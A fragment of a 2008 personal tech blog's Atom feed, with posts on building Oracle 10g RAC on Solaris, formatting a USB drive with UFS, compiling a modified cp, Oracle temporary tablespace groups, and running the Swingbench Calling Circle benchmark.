From here on in, its quite easy to follow Jeff Hunter's &lt;a href=&quot;http://www.oracle.com/technology/pub/articles/hunter_rac10gr2_iscsi.html&quot;&gt;article&lt;/a&gt;. Obviously, you wont be using ASM. The only differences between what to do now and what he has documented is file locations. So you could follow along from &lt;a href=&quot;http://www.oracle.com/technology/pub/articles/hunter_rac10gr2_iscsi_2.html#14&quot;&gt;section 14&lt;/a&gt; and you should be able to get a 10gR2 RAC environment up and running. Obviously, there is some sections such as setting up OCFS2 and ASMLib that can be left out since we are installing on Solaris and not Linux.
</content>
 </entry>
 
 <entry>
   <title>Creating a UFS File System on an External Hard Drive with Solaris 10</title>
   <link href="http://posulliv.github.com/2008/11/29/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10"/>
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/29/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10</id>
   <content type="html">&lt;p&gt;Recently, I wanted to create a UFS file system on a Maxtor OneTouch II external hard drive I have. I wanted to use the external hard drive for storing some large files and I was going to use the drive exclusively with one of my Solaris systems. Now, I didn&amp;#8217;t find much information on the web about how to perform this with Solaris (maybe I wasn&amp;#8217;t searching very well or something) so I thought I would post the procedure I followed here so I&amp;#8217;ll know how to do it again if I need to.&lt;/p&gt;

&lt;p&gt;After plugging the hard drive into my system via one of the USB ports, we can verify that the disk was recognized by the OS by examining the &lt;code&gt;/var/adm/messages&lt;/code&gt; file. With the hard drive I was using, I saw entries like the following:&lt;/p&gt;
&lt;pre&gt;
Mar  2 13:10:33 solaris-filer usba: [ID 912658 kern.info] USB 2.0 device (usbd49,7100) 
operating at hi speed (USB 2.x) on USB 2.0 root hub: storage@3, scsa2usb0 at bus address 2
Mar  2 13:10:33 solaris-filer usba: [ID 349649 kern.info]       Maxtor OneTouch II L60LHYQG
Mar  2 13:10:33 solaris-filer genunix: [ID 936769 kern.info] scsa2usb0 is /pci@0,0/pci1028,11d@1d,7/storage@3
Mar  2 13:10:33 solaris-filer genunix: [ID 408114 kern.info] /pci@0,0/pci1028,11d@1d,7/storage@3 
(scsa2usb0) online
Mar  2 13:10:33 solaris-filer scsi: [ID 193665 kern.info] sd1 at scsa2usb0: target 0 lun 0
&lt;/pre&gt;
&lt;p&gt;The dmesg command could also be used to see similar information. Also, we could use the rmformat command (this lists removable media) to see this information in a much nicer format like so:&lt;/p&gt;
&lt;pre&gt;
# rmformat -l
Looking for devices...
   1. Logical Node: /dev/rdsk/c1t0d0p0
      Physical Node: /pci@0,0/pci-ide@1f,1/ide@1/sd@0,0
      Connected Device: QSI      CDRW/DVD SBW242U UD25
      Device Type: DVD Reader
   2. Logical Node: /dev/rdsk/c2t0d0p0
      Physical Node: /pci@0,0/pci1028,11d@1d,7/storage@3/disk@0,0
      Connected Device: Maxtor   OneTouch II      023g
      Device Type: Removable
#
&lt;/pre&gt;
&lt;p&gt;Now that we now the drive has been identified by Solaris (as &lt;code&gt;/dev/rdsk/c2t0d0p0&lt;/code&gt;) we need to create one Solaris partition (this is Solaris 10 running on the x86 architecture) that uses the whole disk. This accomplished by passing the &lt;code&gt;-B&lt;/code&gt; flag to the &lt;code&gt;fdisk&lt;/code&gt; command, like so:&lt;/p&gt;
&lt;pre&gt;
# fdisk -B /dev/rdsk/c2t0d0p0
&lt;/pre&gt;
&lt;p&gt;Now we will print the disk table to standard out like so:&lt;/p&gt;
&lt;pre&gt;
# fdisk -W - /dev/rdsk/c2t0d0p0
&lt;/pre&gt;
&lt;p&gt;This will output the following information to the screen for the hard drive I am using:&lt;/p&gt;
&lt;pre&gt;
* /dev/rdsk/c2t0d0p0 default fdisk table
* Dimensions:
*    512 bytes/sector
*     63 sectors/track
*    255 tracks/cylinder
*   36483 cylinders
*
* systid:
*    1: DOSOS12
*    2: PCIXOS
*    4: DOSOS16
*    5: EXTDOS
*    6: DOSBIG
*    7: FDISK_IFS
*    8: FDISK_AIXBOOT
*    9: FDISK_AIXDATA
*   10: FDISK_0S2BOOT
*   11: FDISK_WINDOWS
*   12: FDISK_EXT_WIN
*   14: FDISK_FAT95
*   15: FDISK_EXTLBA
*   18: DIAGPART
*   65: FDISK_LINUX
*   82: FDISK_CPM
*   86: DOSDATA
*   98: OTHEROS
*   99: UNIXOS
*  101: FDISK_NOVELL3
*  119: FDISK_QNX4
*  120: FDISK_QNX42
*  121: FDISK_QNX43
*  130: SUNIXOS
*  131: FDISK_LINUXNAT
*  134: FDISK_NTFSVOL1
*  135: FDISK_NTFSVOL2
*  165: FDISK_BSD
*  167: FDISK_NEXTSTEP
*  183: FDISK_BSDIFS
*  184: FDISK_BSDISWAP
*  190: X86BOOT
*  191: SUNIXOS2
*  238: EFI_PMBR
*  239: EFI_FS
*

* Id    Act  Bhead  Bsect  Bcyl    Ehead  Esect  Ecyl    Rsect    Numsect
191   128  0      1      1       254    63     1023    16065    586083330
&lt;/pre&gt;
&lt;p&gt;We now need to calculate the maximum amount of usable storage. This is done by multiplying bytes/sectors (512 in my case) by the number of sectors listed at the bottom of the output shown above. We then divide this number by 1024&lt;em&gt;1024 to yield MBs.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;So in my case, this will work out as 286173.5009765625 MB.&lt;/p&gt;

&lt;p&gt;Now, we need to setup a partition table file. This will be a regular text file and you can name it whatever you like. For the sake of this post, I will name it disk_slices.txt. The contents of this file are:&lt;/p&gt;
&lt;pre&gt;
slices: 0 = 2MB, 286170MB, &quot;wm&quot;, &quot;root&quot; :
      1 = 0, 1MB, &quot;wu&quot;, &quot;boot&quot; :
      2 = 0, 286172MB, &quot;wm&quot;, &quot;backup&quot;
&lt;/pre&gt;
&lt;p&gt;To create these slices on the disk, we run:&lt;/p&gt;
&lt;pre&gt;
# rmformat -s disk_slices.txt /dev/rdsk/c2t0d0p0
# devfsadm
# devfsadm -C
&lt;/pre&gt;
&lt;p&gt;To create the UFS file system on the newly created slice, I run the following and the output from running this command is also shown:&lt;/p&gt;
&lt;pre&gt;
# newfs /dev/rdsk/c2t0d0s0
newfs: construct a new file system /dev/rdsk/c2t0d0s0: (y/n)? y
/dev/rdsk/c2t0d0s0:     586076160 sectors in 95390 cylinders of 48 tracks, 128 sectors
      286170.0MB in 5962 cyl groups (16 c/g, 48.00MB/g, 5824 i/g)
super-block backups (for fsck -F ufs -o b=#) at:
32, 98464, 196896, 295328, 393760, 492192, 590624, 689056, 787488, 885920,
Initializing cylinder groups:
...............................................................................
........................................
super-block backups for last 10 cylinder groups at:
585105440, 585203872, 585302304, 585400736, 585499168, 585597600, 585696032,
585794464, 585892896, 585991328
#
&lt;/pre&gt;
&lt;p&gt;And now I&amp;#8217;m finished, I now have a UFS file system created on my USB hard drive which can be mounted by my Solaris system. To mount this file system, I can just:&lt;/p&gt;
&lt;pre&gt;
# mount -F ufs /dev/rdsk/c2t0d0p0 /u01
&lt;/pre&gt;</content>
 </entry>
 
 <entry>
   <title>Building a Modified cp Binary on Solaris 10</title>
   <link href="http://posulliv.github.com/2008/11/29/building-a-modified-cp-binary-on-solaris-10"/>
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/29/building-a-modified-cp-binary-on-solaris-10</id>
   <content type="html">&lt;p&gt;I thought I would write a post on how I setup my Solaris 10 system to build an improved version of the stock cp(1) utility that comes with Solaris 10 in case anyone arrives here from Kevin Closson&amp;#8217;s blog. If you are looking for more background information on why I am performing this modification, have a look at &lt;a href='http://kevinclosson.wordpress.com/2007/02/23/standard-file-utilities-with-direct-io/'&gt;this post&lt;/a&gt; by Kevin Closson.&lt;/p&gt;
&lt;span style='bold;'&gt;GNU Core Utilities&lt;/span&gt;
&lt;p&gt;We need to download the source code for the cp utility that we will be modifying. This source code is available as part of the &lt;a href='http://www.gnu.org/software/coreutils/'&gt;GNU Core Utilities&lt;/a&gt;. &lt;ul&gt;
	&lt;li&gt;&lt;a href='http://ftp.gnu.org/pub/gnu/coreutils/coreutils-5.2.1.tar.gz'&gt;Coreutils 5.2.1&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt; Down the software to an appropriate location on your system.&lt;/p&gt;
&lt;span style='bold;'&gt;Modifying the Code&lt;/span&gt;
&lt;p&gt;Untar the code first on your system.&lt;/p&gt;
&lt;pre&gt;
# gunzip coreutils-5.2.1.tar.gz
# tar xvf coreutils-5.2.1.tar
&lt;/pre&gt;
&lt;p&gt;Proceed to the &lt;code&gt;coreutils-5.2.1/src&lt;/code&gt; directory. Open the &lt;code&gt;copy.c&lt;/code&gt; file with an editor. The following are the differences between the modified &lt;code&gt;copy.c&lt;/code&gt; file and the original &lt;code&gt;copy.c&lt;/code&gt; file:&lt;/p&gt;
&lt;pre&gt;
# diff -b copy.c.orig copy.c
287c315
&amp;lt; buf_size =&quot; ST_BLKSIZE&quot;&amp;gt;   /* buf_size = ST_BLKSIZE (sb);*/

288a317,319
&amp;gt;
&amp;gt;      buf_size = 8388608 ;
&amp;gt;
&lt;/pre&gt;&lt;span style='bold;'&gt;Building the Binary&lt;/span&gt;
&lt;p&gt;To build the modified cp binary, navigate first to the &lt;code&gt;coreutils-5.2.1&lt;/code&gt; directory. Then enter the following (ensure that the &lt;code&gt;gcc&lt;/code&gt; binary is in your &lt;code&gt;PATH&lt;/code&gt; first; it is located at &lt;code&gt;/usr/sfw/bin/&lt;/code&gt;):&lt;/p&gt;
&lt;pre&gt;
# ./configure
# /usr/ccs/bin/make
&lt;/pre&gt;
&lt;p&gt;We don&amp;#8217;t want to do &lt;code&gt;make install&lt;/code&gt; as is the usual when building something from source like this as it would replace the stock cp(1) utility. Instead, we will copy the cp binary located in the &lt;code&gt;coreutils-5.2.1/src&lt;/code&gt; directory like so:&lt;/p&gt;
&lt;pre&gt;
# cp coreutils-5.2.1/src/cp /usr/bin/cp8m
&lt;/pre&gt;&lt;span style='bold;'&gt;Results of using the Modified cp&lt;/span&gt;
&lt;p&gt;See &lt;a href='http://kevinclosson.wordpress.com/2007/03/15/copying-files-on-solaris-slow-or-fast-its-your-choice/'&gt;Kevin Closson's post&lt;/a&gt; on copying files on Solaris for some in-depth discussion of this topic and more information on the reasoning behind making this modification to the cp(1) utility.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>White Paper at Oracle OpenWorld</title>
   <link href="http://posulliv.github.com/2008/11/25/white-paper-at-oracle-openworld"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/white-paper-at-oracle-openworld</id>
   <content type="html">&lt;p&gt;A white paper that I was part of writing is being presented at Oracle OpenWorld this week. The paper is entitled &amp;#8216;High Availability Options for the Oracle Database&amp;#8217;. It is being presented by Dan Norris and I wrote the sections on Export/Import and data pump. The paper is available for download from the IT Convergence website &lt;a href='http://www.itconvergence.com/portal/page?_pageid=33,39115&amp;amp;_dad=portal&amp;amp;_schema=PORTAL'&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Dan is kinda like my mentor here at &lt;a href='http://www.itconvergence.com/'&gt;IT Convergence&lt;/a&gt;. He has a lot of knowledge and experience with Oracle especially with RAC and is quite well known in the Oracle community.&lt;/p&gt;

&lt;p&gt;At the moment, I&amp;#8217;ve been working on setting up a cheap 10g RAC environment in the office for testing and educational purposes. The RAC is up and running now. I followed &lt;a href='http://www.oracle.com/technology/pub/articles/hunter_rac10gr2.html'&gt;this excellent article&lt;/a&gt; by Jeffrey Hunter on setting up a RAC environment with a budget!&lt;/p&gt;

&lt;p&gt;OCFS2 would not play nice for me though so I decided to use RAW devices instead of OCFS like Mr. Hunter did in his article. Besides that though, I pretty much followed his article and was able to get my 10g RAC up and running (after a small bit of hassle with the Oracle firewire modules!).&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Temporary Tablespace Groups</title>
   <link href="http://posulliv.github.com/2008/11/25/temporary-tablespace-groups"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/temporary-tablespace-groups</id>
   <content type="html">&lt;p&gt;Temporary tablespace groups are a new feature introduced in Oracle10g. A temporary tablespace group is a list of tablespaces and is implicitly created when the first temporary tablespace is created. Its members can only be temporary tablespaces.&lt;/p&gt;

&lt;p&gt;You can specify a tablespace group name wherever a tablespace name would appear when you assign a default temporary tablespace for the database or a temporary tablespace for a user. Using a tablespace group, rather than a single temporary tablespace, can alleviate problems caused where one tablespace is inadequate to hold the results of a sort, particularly on a table that has many partitions. A tablespace group enables parallel execution servers in a single parallel operation to use multiple temporary tablespaces.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Group Creation&lt;/span&gt;
&lt;p&gt;You do not explicitly create a tablespace group. Rather, it is created implicitly when you assign the first temporary tablespace to the group. The group is deleted when the last temporary tablespace it contains is removed from it.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; CREATE TEMPORARY TABLESPACE temp_test_1&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_1.tmp'&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 3 SIZE 100 M&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 4 TABLESPACE GROUP temp_group_1;&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;Tablespace created.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;
&lt;p&gt;If the group &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;temp_group_1&lt;/span&gt;&lt;/span&gt; did not already exist, it would be created at this time. Now we will create a temporary tablespace but will not add it to the group.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; CREATE TEMPORARY TABLESPACE temp_test_2&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_2.tmp'&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 3 SIZE 100 M&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 4 TABLESPACE GROUP '';&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;Tablespace created.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;
&lt;p&gt;Now we will alter this tablespace and add it to a group.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; ALTER TABLESPACE temp_test_2&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TABLESPACE GROUP temp_group_1;&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;Tablespace altered.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;
&lt;p&gt;To de-assign a temporary tablespace from a group, we issue an &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;ALTER TABLESPACE&lt;/span&gt;&lt;/span&gt; command as so:&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; ALTER TABLESPACE temp_test_2&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TABLESPACE GROUP '';&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;Tablespace altered.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;&lt;span style='font-weight: bold;'&gt;Assign Users to Temporary Tablespace Groups&lt;/span&gt;
&lt;p&gt;In this example, we will assign the user &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SCOTT&lt;/span&gt;&lt;/span&gt; to the temporary tablespace group &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;temp_group_1&lt;/span&gt;&lt;/span&gt;.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; ALTER USER scott&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TEMPORARY TABLESPACE temp_group_1;&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;User altered.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;
&lt;p&gt;Now when we query the &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;DBA_USERS&lt;/span&gt;&lt;/span&gt; view to see &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SCOTT&lt;/span&gt;&lt;/span&gt;&amp;#8217;s default temporary tablespace, we will see that the group is his temporary tablespace now. &lt;span style='font-size:85%;'&gt;
&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; SELECT username, temporary_tablespace&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 FROM DBA_USERS&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 3 WHERE username = 'SCOTT';&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;span style='font-family: courier new;'&gt;USERNAME TEMPORARY_TABLESPACE&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;-------- ------------------------------&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SCOTT    TEMP_GROUP_1&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;&lt;span style='font-weight: bold;'&gt;Data Dictionary Views&lt;/span&gt;
&lt;p&gt;To view a temporary tablespace group and it smembers we can view the &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;DBA_TABLESPACE_GROUPS&lt;/span&gt;&lt;/span&gt; data dictionary view.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; SELECT * FROM DBA_TABLESPACE_GROUPS;&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;GROUP_NAME   TABLESPACE_NAME&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;------------ ------------------------------&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;TEMP_GROUP_1 TEMP_TEST_1&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;TEMP_GROUP_1 TEMP_TEST_2&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;&lt;span style='font-weight: bold;'&gt;Advantages of Temporary Tablespace Groups&lt;/span&gt;&lt;ul&gt;
	&lt;li&gt;Allows multiple default temporary tablespaces&lt;/li&gt;
	&lt;li&gt;A single SQL operation can use muultiple temporary tablespaces for sorting&lt;/li&gt;
	&lt;li&gt;Rather than have all temporary I/O go against a single temporary tablespace, the database can distribute that I/O load among all the temporary tablespaces in the group.&lt;/li&gt;
	&lt;li&gt;If you perform an operation in parallel, child sessions in that parallel operation are able to use multiple tablespaces.&lt;/li&gt;
&lt;/ul&gt;</content>
 </entry>
 
 <entry>
   <title>Playing with Swingbench</title>
   <link href="http://posulliv.github.com/2008/11/25/playing-with-swingbench"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/playing-with-swingbench</id>
   <content type="html">&lt;a href='http://www.dominicgiles.com/swingbench.html'&gt;Swingbench&lt;/a&gt;&lt;span style='font-weight: bold;'&gt;A Note About the Environment Used for Testing&lt;/span&gt;
&lt;p&gt;Before we delve into using Swingbench, I thought I should mention a little about the environment used for testing as it affects the results a lot! The box used to run the database in this post is a Dell Latitude D810 laptop with a 2.13 GHz processor and 1GB of RAM. It is running on Solaris 10, specifically the 11/06 release. The datafiles and redo log files are stored on a Maxtor OneTouch II external hard drive connected via a USB 2.0 interface.&lt;/p&gt;

&lt;p&gt;The datafiles for the database reside on a 80 GB partition which is formatted with a UFS filesystem and the redo logs reside on a 20 GB partition which is also formatted with a UFS filesystem. The database is not running in archive log mode and there is no flash recovery area configured.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Enabling Direct I/O&lt;/span&gt;
&lt;p&gt;One quick section on how we will be enabling direct I/O for testing purposes. The UFS file system (as does most file systems) supports mounting the file system options which enable processes to bypass the OS page cache. One way to enable direct I/O on a UFS file system is to mount the file system with the &lt;code&gt;forcedirectio&lt;/code&gt; mount option as so: &lt;pre&gt;# mount -o forcedirectio /dev/dsk/c2t1d0s1 /u02&lt;/pre&gt; Another method which is possible is setting the &lt;code&gt;FILESYSTEMIO_OPTIONS=SETALL&lt;/code&gt; parameter within Oracle (available in 9i and later). As &lt;a href='http://blogs.sun.com/glennf/'&gt;Glenn Fawcett&lt;/a&gt; states in &lt;a href='http://blogs.sun.com/glennf/entry/where_do_you_cache_oracle'&gt;this excellent post&lt;/a&gt; on direct I/O, the &lt;code&gt;SETALL&lt;/code&gt; value passed to the &lt;code&gt;FILESYSTEMIO_OPTIONS&lt;/code&gt; parameters sets all the options for a particular file system to enable direct I/O or async I/O. When this parameter is set as stated, Oracle will use an API to enable direct I/O when it opens database files.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Swingbench Installation and Configuration&lt;/span&gt;
&lt;p&gt;Now that we&amp;#8217;ve got the preliminaries out of the way, its time to get on to the main reason for this post. The Swingbench code is shipped in a zip file which can be downloaded from &lt;a href='http://www.dominicgiles.com/downloads.html'&gt;here&lt;/a&gt;. A prerequisite for running Swingbench is that a Java virtual machine needs to be present on the machine which you will be running Swingbench on.&lt;/p&gt;

&lt;p&gt;After unzipping the Swingbench zip file, you will need to edit the &lt;code&gt;swingbench.env&lt;/code&gt; file (if on a UNIX platform) found in the top-level swingbench directory. The following variables need to be modified according to your environment: &lt;ul&gt;
	&lt;li&gt;&lt;code&gt;ORACLE_HOME&lt;/code&gt;&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;JAVA_HOME&lt;/code&gt;&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;SWINGHOME&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt; If using the Oracle instance client software instead of a full RDBMS install on the machine you are running Swingbench, the &lt;code&gt;CLASSPATH&lt;/code&gt; variable must also be modified from &lt;code&gt;$ORACLE_HOME/jdbc/lib/ojdbc14.jar&lt;/code&gt; to &lt;code&gt;$ORACLE_HOME/lib/ojdbc14.jar&lt;/code&gt;.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Installing Calling Circle&lt;/span&gt;
&lt;p&gt;The Calling Circle is an open-source preconfigured benchmark which comes with Swingbench. The Order Entry benchmark also comes with Swingbench but for the purposes of this article, we will only discuss the Calling Circle benchmark.&lt;/p&gt;

&lt;p&gt;The Calling Circle benchmark implements an example OLTP online telecommunications application. The goal of this application is to simulate a randomized workload of customer transactions and measure transaction throughput and response times. Approximately 97 % of the transactions cause at least one database update, with well over three quarters performing two or more updates. More information can be found in the Readme.txt file which comes with the Swingbench software.&lt;/p&gt;

&lt;p&gt;The first step for installing Calling Circle is to create the Calling Circle schema (CC) in the database. This is achieved using the &lt;code&gt;ccwizard&lt;/code&gt; executable found in the &lt;code&gt;swingbench/bin&lt;/code&gt; directory . &lt;pre&gt;$ ./ccwizard&lt;/pre&gt; Click &lt;span&gt;Next&lt;/span&gt; on the welcome screen and you will then be presented with the screen shown on the below:&lt;/p&gt;
&lt;a href='http://4.bp.blogspot.com/_heUWGgTt1gk/STIJy46YGgI/AAAAAAAAA4k/ihrvixJyzhM/s1600-h/cc1.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://4.bp.blogspot.com/_heUWGgTt1gk/STIJy46YGgI/AAAAAAAAA4k/ihrvixJyzhM/s400/cc1.JPG' id='BLOGGER_PHOTO_ID_5274288883479616002' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 268px;' /&gt;&lt;/a&gt;
&lt;p&gt;Choose the option to create the Calling Circle schema. In the next screen, enter the connection details of the database you will be creating the schema in. This will involve entering the host name, port number (if not using the default port of 1521 for your listener) and the database service name. Also, ensure that you choose the type IV Thin JDBC driver. Click &lt;span&gt;Next&lt;/span&gt; when you have entered this information.&lt;/p&gt;

&lt;p&gt;The next screen involves the schema details for the Calling Circle schema. Enter appropriate locations for the datafiles on your system. When finished entering information on this screen, click &lt;span&gt;Next&lt;/span&gt; to continue. This will bring you to the Schema Sizing window as shown below:&lt;/p&gt;
&lt;a href='http://2.bp.blogspot.com/_heUWGgTt1gk/STIKYmx3XTI/AAAAAAAAA4s/5cCmn4wE19w/s1600-h/cc2.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://2.bp.blogspot.com/_heUWGgTt1gk/STIKYmx3XTI/AAAAAAAAA4s/5cCmn4wE19w/s320/cc2.JPG' id='BLOGGER_PHOTO_ID_5274289531447106866' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 216px;' /&gt;&lt;/a&gt;
&lt;p&gt;Use the slider to select the schema size you wish to use. For this post, I chose to use a schema size with 2,023,019 customers which implies a tablespace of size 2.1GB for data and a tablespace of size 1.3GB for indexes. When finished choosing your schema size, click &lt;span&gt;Next&lt;/span&gt; to continue. Click &lt;span&gt;Finish&lt;/span&gt; on the next screen to complete the wizard and create the schema. A progress bar will appear as shown below&lt;/p&gt;
&lt;a href='http://4.bp.blogspot.com/_heUWGgTt1gk/STIK0KMrsLI/AAAAAAAAA40/_6lpY2NkQns/s1600-h/cc3.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://4.bp.blogspot.com/_heUWGgTt1gk/STIK0KMrsLI/AAAAAAAAA40/_6lpY2NkQns/s320/cc3.JPG' id='BLOGGER_PHOTO_ID_5274290004811296946' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 216px;' /&gt;&lt;/a&gt;&lt;span style='font-weight: bold;'&gt;Creating the Input Data for Calling Circle&lt;/span&gt;
&lt;p&gt;Before each run of the Calling Circle application it is necessary to create the input data for the benchmark to run. This is accomplished using the ccwizard program we used previously for creating the Calling Circle schema. Start up the ccwizard program again and click &lt;span&gt;Next&lt;/span&gt; on the welcome screen. On the &amp;#8220;Select Task&amp;#8221; screen show previously, this time select to &amp;#8220;Generate Data for Benchmark Run&amp;#8221; and click &lt;span&gt;Next&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;In the &amp;#8220;Schema Details&amp;#8221; window which follows, enter the details of the schema which you created in the last section. Click &lt;span&gt;Next&lt;/span&gt; once all the necessary information has been entered. You will then be presented with the &amp;#8220;Benchmark Details&amp;#8221; screen as shown below:&lt;/p&gt;
&lt;a href='http://3.bp.blogspot.com/_heUWGgTt1gk/STILE_DDDvI/AAAAAAAAA48/KTrL5Upydjs/s1600-h/cc4.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://3.bp.blogspot.com/_heUWGgTt1gk/STILE_DDDvI/AAAAAAAAA48/KTrL5Upydjs/s320/cc4.JPG' id='BLOGGER_PHOTO_ID_5274290293875871474' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 217px;' /&gt;&lt;/a&gt;
&lt;p&gt;In this post, we will use 1000 transactions for each test as seen in the &amp;#8220;Number of Transactions&amp;#8221; dialog window above. Press &lt;span&gt;Next&lt;/span&gt; to continue and you will be presented with the final screen. Click &lt;span&gt;Finish&lt;/span&gt; to create the benchmark data.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Starting the Benchmark Test&lt;/span&gt;
&lt;p&gt;Now that we have the Calling Circle schema created and the input data generated, we can start our tests. To start up Swingbench and ensure that it operates with the Calling Circle benchmark we can pass the sample Calling Circle configuration file (&lt;code&gt;ccconfig.xml&lt;/code&gt;) which is supplied with Swingbench as a runtime parameter as so: &lt;pre&gt;$ ./swingbench -c sample/ccconfig.xml&lt;/pre&gt; This will start up Swingbench with the sample configuration for the Calling Circle application but only a few settings need to be changed for is to use this configuration. All that needs to be changed is the connection settings for the host you have already setup the Calling Circle schema on. Change the connection settings as necessary for your environment.&lt;/p&gt;

&lt;p&gt;The following screen shot show the Calling Circle application running in Swingbench:&lt;/p&gt;
&lt;a href='http://1.bp.blogspot.com/_heUWGgTt1gk/STILZ5Z99TI/AAAAAAAAA5E/nsyz4cLLO3Y/s1600-h/cc6.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://1.bp.blogspot.com/_heUWGgTt1gk/STILZ5Z99TI/AAAAAAAAA5E/nsyz4cLLO3Y/s320/cc6.JPG' id='BLOGGER_PHOTO_ID_5274290653138646322' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 203px;' /&gt;&lt;/a&gt;
&lt;p&gt;We will be performing 1000 transactions during each test run as specified when we generated the sample data. The Swingbench configuration we will be using for every test we perform is as follows:&lt;/p&gt;
&lt;a href='http://3.bp.blogspot.com/_heUWGgTt1gk/STILqWF5wWI/AAAAAAAAA5M/BaEBxRorHJU/s1600-h/tab1.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://3.bp.blogspot.com/_heUWGgTt1gk/STILqWF5wWI/AAAAAAAAA5M/BaEBxRorHJU/s320/tab1.JPG' id='BLOGGER_PHOTO_ID_5274290935717020002' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 56px;' /&gt;&lt;/a&gt;
&lt;p&gt;This workload is typical of an OLTP application with 40% reads and 60% writes. The number of users associated with the workload is 15. We will use this exact workload for every test we perform.&lt;/p&gt;
